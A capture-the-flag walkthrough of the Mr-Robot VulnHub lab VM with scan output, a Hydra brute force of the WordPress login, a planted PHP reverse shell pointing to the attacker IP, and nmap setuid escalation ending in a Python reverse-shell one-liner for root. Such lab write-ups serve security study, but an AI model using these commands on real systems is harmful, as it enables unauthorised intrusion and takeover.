MR-ROBOT -VULNHUB- Linux
Complete walkthrough, of the season content:
RECOGNITION PHASE:
NETWORK DISCOVERY:
We ane going to use arp-scan tool in order to discover the target machine this software send request over arp protocol on broadcast mode, and wait for the hosts response via this type of protocol as you can see below:
NMAP:
On this step, from the attacker machine we recover information about the open ports and services of the target machine. We can use some options in order to execute scripts and obtain information about vulnerabilities on the external host.
nmap -sC -sV -p - -n -v 192.168.1.38 -oN target_nmap
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-27 20:42 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:42
Completed NSE at 20:42, 0.00s elapsed
Initiating NSE at 20:42
Completed NSE at 20:42, 0.00s elapsed
Initiating NSE at 20:42
Completed NSE at 20:42, 0.00s elapsed
Initiating Ping Scan at 20:42
Scanning 192.168.1.38 [2 ports]
Completed Ping Scan at 20:42, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 20:42
Scanning 192.168.1.38 [65535 ports]
Discovered open port 443/tcp on 192.168.1.38
Discovered open port 80/tcp on 192.168.1.38
Connect Scan Timing: About 20.36% done; ETC: 20:45 (0:02:01 remaining)
Connect Scan Timing: About 46.68% done; ETC: 20:45 (0:01:10 remaining)
Completed Connect Scan at 20:44, 109.34s elapsed (65535 total ports)
Initiating Service scan at 20:44
Scanning 2 services on 192.168.1.38
Completed Service scan at 20:44, 12.05s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.38.
Initiating NSE at 20:44
Completed NSE at 20:45, 1.44s elapsed
Initiating NSE at 20:45
Completed NSE at 20:45, 0.03s elapsed
Initiating NSE at 20:45
Completed NSE at 20:45, 0.00s elapsed
Nmap scan report for 192.168.1.38
Host is up (0.0027s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Issuer: commonName=www.example.com
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2015-09-16T10:45:03
| Not valid after: 2025-09-13T10:45:03
| MD5: 3c16 3b19 87c3 42ad 6634 c1c9 d0aa fb97
|_SHA-1: ef0c 5fa5 931a 09a5 687c a2c2 80c4 c792 07ce f71b
NSE: Script Post-scanning.
Initiating NSE at 20:45
Completed NSE at 20:45, 0.00s elapsed
Initiating NSE at 20:45
Completed NSE at 20:45, 0.00s elapsed
Initiating NSE at 20:45
Completed NSE at 20:45, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.33 seconds
The conclusion of nmap scan is that we found the following open ports with the services:
EXPLOITATION:
80/tcp http and 443/tcp https :
On the both services we found the same web page that has a dynamic and interactive interface, this webpage contains information relative to the "MR. ROBOT" famous hacking serie.
The target machine web content simule an operating system, but all of content is developed using javascript and jquery, so nice:
The webpage use an uncommon way of user interaction, for example:
- Interactue with the user keyboard using a keylogger software javascript function.
- Interactue with the user mause events with an javascript event mause windows click capture and detection.
The javscript functions, strored on attacker local browser allow execute the folowing commands:
prepare: It show the robot video stored on target machine, that It is allows in two different formats, webm and mp4 on video directory:
http://192.168.1.38/video/prepare.webm
http://192.168.1.38/video/prepare.mp4
whoismrrobot.com
fsociety: It show an other video that ask to clients about are you ready to join fsociety?
inform: It display stored images on webserver
http://192.168.1.38/images/headlines/deflategate.jpg
http://192.168.1.38/images/headlines/billionaire.jpg
http://192.168.1.38/images/headlines/creditcards2.jpg
http://192.168.1.38/images/headlines/metgala.jpg
questions: It display images stored on webserver too.
http://192.168.1.38/images/question/jefferson.jpg
http://192.168.1.38/images/question/steals.jpg
http://192.168.1.38/images/question/madoff.jpg
http://192.168.1.38/images/question/owned.jpg
wakeup: It display a new video
http://192.168.1.38/video/wakeup.webm
join: it show an other interactive webpage location but in this case the html contain util information such the CMS wordpress location, version context...
We found a lot of information about the target machine without using automatized scan tools:
http://192.168.1.38/wp-login.php
http://192.168.1.38/wp-content/themes/
http://192.168.1.38/xmlrpc.php?rsd
http://192.168.1.38/wp-includes/wlwmanifest.xml
http://192.168.1.38/wp-loginNow we are to recognize the host web using the next tools:wfuzzwfuzz --hc 404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://192.168.1.38/FUZZinterested directories.000000053: 302 0 L 0 W 0 Ch "login" 000000124: 301 0 L 0 W 0 Ch "0" 000000126: 301 0 L 0 W 0 Ch "feed" 000000133: 301 7 L 20 W 234 Ch "video" 000000163: 301 0 L 0 W 0 Ch "image" 000000169: 301 0 L 0 W 0 Ch "atom" 000000259: 301 7 L 20 W 234 Ch "admin" 000000241: 301 7 L 20 W 239 Ch "wp-content" 000000331: 301 7 L 20 W 234 Ch "audio" 000000348: 200 2027 L 19569 W 489204 Ch "intro" 000000475: 200 53 L 161 W 2740 Ch "wp-login" 000000551: 301 0 L 0 W 0 Ch "rss2" 000000550: 301 7 L 20 W 232 Ch "css" 000000679: 200 385 L 3179 W 19930 Ch "license" 000000786: 301 7 L 20 W 240 Ch "wp-includes" 000000953: 301 7 L 20 W 231 Ch "js" 000000980: 301 0 L 0 W 0 Ch "Image" 000001632: 301 0 L 0 W 0 Ch "page1" 000001604: 301 0 L 0 W 0 Ch "rdf" 000001765: 200 3 L 4 W 41 Ch "robots" 000001730: 200 97 L 842 W 7334 Ch "readme" 000002927: 302 0 L 0 W 0 Ch "dashboard" 000003790: 301 0 L 0 W 0 Ch "%20" 000007180: 301 7 L 20 W 237 Ch "wp-admin" 000010825: 403 0 L 14 W 94 Ch "phpmyadmin" 000011090: 301 0 L 0 W 0 Ch "0000" 000017049: 405 0 L 6 W 42 Ch "xmlrpc"000045240: 200 30 L 98 W 1188 Ch "http://192.168.1.38/" 000045773: 301 0 L 0 W 0 Ch "IMAGE" 000046026: 302 0 L 0 W 0 Ch "wp-signup"niktonikto --url http://192.168.1.38 -C all - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.1.38 + Target Hostname: 192.168.1.38 + Target Port: 80 + Start Time: 2021-08-27 21:50:54 (GMT2) --------------------------------------------------------------------------- + Server: Apache + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Retrieved x-powered-by header: PHP/5.5.29 + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php + OSVDB-3092: /admin/: This might be interesting... + Uncommon header 'link' found, with contents: <http://192.168.1.38/?p=23>; rel=shortlink + /wp-links-opml.php: This WordPress script reveals the installed version. + OSVDB-3092: /license.txt: License file found may identify site software. + /admin/index.html: Admin login page/section found. + Cookie wordpress_test_cookie created without the httponly flag + /wp-login/: Admin login page/section found. + /wordpress: A Wordpress installation was found. + /wp-admin/wp-login.php: Wordpress login found + /wordpresswp-admin/wp-login.php: Wordpress login found + /blog/wp-login.php: Wordpress login found + /wp-login.php: Wordpress login found + /wordpresswp-login.php: Wordpress login found + 26522 requests: 0 error(s) and 18 item(s) reported on remote host + End Time: 2021-08-27 22:47:27 (GMT2) (3393 seconds) ---------------------------------------------------------------------------wp-scann
wpscan --url http://192.168.1.38
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N][+] URL: http://192.168.1.38/ [192.168.1.38]
[+] Started: Fri Aug 27 21:51:47 2021
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache
| - X-Mod-Pagespeed: 1.9.32.3-4523
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.1.38/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.1.38/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://192.168.1.38/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.1.38/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.3.26 identified (Latest, released on 2021-05-13).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.1.38/8f3fbf5.html, Match: '-release.min.js?ver=4.3.26'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.1.38/8f3fbf5.html, Match: 'WordPress 4.3.26'
[+] WordPress theme in use: twentyfifteen
| Location: http://192.168.1.38/wp-content/themes/twentyfifteen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://192.168.1.38/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://192.168.1.38/wp-content/themes/twentyfifteen/style.css?ver=4.3.26
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.1.38/wp-content/themes/twentyfifteen/style.css?ver=4.3.26, Match: 'Version: 1.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:06 <===================================================================================================> (137 / 137) 100.00% Time: 00:00:06
[i] No Config Backups Found.
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Aug 27 21:51:59 2021
[+] Requests Done: 168
[+] Cached Requests: 6
[+] Data Sent: 37.121 KB
[+] Data Received: 273.36 KB
[+] Memory used: 228.863 MB
[+] Elapsed time: 00:00:11
**In that point we found that the web content and publish services it seems that not contains vulnerable code, plugins or services for exploitation pahse. So we are going to make a brute force attack, with the recovered information fsociety.dic to the CMS login webpage.
Brute force attack with fsociety.dic and Hydra tool:
Using burpsuit such a proxy, qe obtain the valid post payload for the input administrarion login form:
1. Find a valid username
kali@kali:~/VULNHUB/MR-ROBOT/data$ cat fsocity.dic | sort | uniq >users.dic
HUB/MR-ROBOT/data$ cat users.dic | wc -l
11451
kali@kali:~/VULNHUB/MR-ROBOT/data$ hydra -L users.dic -P /usr/share/wordlists/rockyou.txt 192.168.1.38 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.38%2Fwp-admin%2F&testcookie=1:Invalid username"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-28 00:16:59
[80][http-post-form] host: 192.168.1.38 login: elliot
2. Find a valid credentials for elliot user:
So at this moment, we can attack the password value on administration wordpress login:
hydra -l "elliot" -P fsocity.dic 192.168.1.38 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.38%2Fwp-admin%2F&testcookie=1:is incorrect"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
And finally we are inside:
Obtaining a reverse shell on target machine:
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
we should adapt the php script to your attacker machine.
kali@kali:~/VULNHUB/MR-ROBOT/script$ cat php-reverse-shell-1.0/php-reverse-shell.php | grep CHANGE
$ip = '192.168.1.34'; // CHANGE THIS
$port = 8989; // CHANGE THIS
In that case, we modify the Theme php content:
http://192.168.1.38/wp-content/themes/twentyfifteen/content-link.php
And wait on attacker machine for spawned reverse shell:
right now we got a shell with daemon user permissions!!
PRIVILEGE EXCALATION
Reviewing the operative system with lse.sh script:
On tmp directory download script and add execution permissions.
$ cd /tmp
cd /tmp
$ wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh
wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh
--2021-08-28 04:20:40-- https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh [following]
--2021-08-28 04:20:41-- https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 42207 (41K) [text/plain]
Saving to: 'lse.sh'
100%[======================================>] 42,207 --.-K/s in 0.003s
2021-08-28 04:20:41 (11.8 MB/s) - 'lse.sh' saved [42207/42207]
$ ls
ls
lse.sh
Relevant findings:
Use an NMAP with setuid permissions and interactive parameter:
$ /usr/local/bin/nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !whoami
root
nmap> waiting to reap child : No child processes
! id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=0(root),1(daemon)
Spawn s reverse shell with a root privileges to the attacker machine:
nmap> ! python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.34",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
And finally get the flag:
